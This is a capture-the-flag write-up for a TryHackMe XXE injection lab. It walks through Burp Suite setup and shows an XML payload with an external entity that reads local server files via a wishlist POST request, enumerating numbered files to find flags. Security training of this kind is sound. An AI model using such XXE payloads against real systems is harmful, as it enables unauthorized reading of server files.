Day 5: SOC-mas XX-what-ee?

Note:

Hey! Before you go through this writeup try the task first by your self and if you get stuck come back and checkout the writeup.

XML (Extensible Markup Language) is a way to structure and store data in a plain text format that’s easy to read and share. It uses tags to define elements, like <name>John</name>, making it flexible for representing different types of information. XML is often used for data exchange between systems, configuration files, and even storing data for applications. While it’s super versatile, it can get bulky compared to newer formats like JSON.

Before we start we need to set up BurpSuite as the challenge suggests. I’m going to keep it short,

1. Go through the initial step up process, you can leave everything as default.
2. Go to the Proxy tab and click on settings
3. In Settings under Tools → Burp's Browser click on the Allow Burp's browser to run without a sandbox option

If you need more help with setting up BurpSuite refer to the Tryhackme challenge it self. It has a step by guide with screenshots on how to do this set up.

Once that is done navigate back to the Proxy tab and click on Open browser . In the open browser and navigate to your AttackBox IP.

If when you try to visit the web page through the Burp browser and nothing is loading, go back to BurpSuite in the Proxy → Intercept tab turn the Intercept option to Off.

Q: What is the flag discovered after navigating through the wishes?

A: In the web site add a product to the wish list. In BurpSuite navigate to Proxy → HTTP History and check an POST entry for /Wishlist.php.

Right click on it and click Send to Repeater.

Go to the Repeater tab and the post request should be there.

Modify the request XML with the one provided in the challenge description.

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/var/www/html/wishes/wish_1.txt"> ]>
<wishlist>
	<user_id>1</user_id>
	<item>
	       <product_id>&payload;</product_id>
	</item>
</wishlist>

Change the number inwish_<number>.txt and go through each text file until the flag is found.

Q: What is the flag seen on the possible proof of sabotage?

A: Towards the end of the challenge description there is mention of a change log being hosted at http://MACHINE-IP/CHANGELOG . Flag is there.

Q: If you want to learn more about the XXE injection attack, check out the XXE room!

A: No Answer needed!

Q: Following McSkidy's advice, Software recently hardened the server. It used to have many unneeded open ports, but not anymore. Not that this matters in any way.

A: No Answer needed!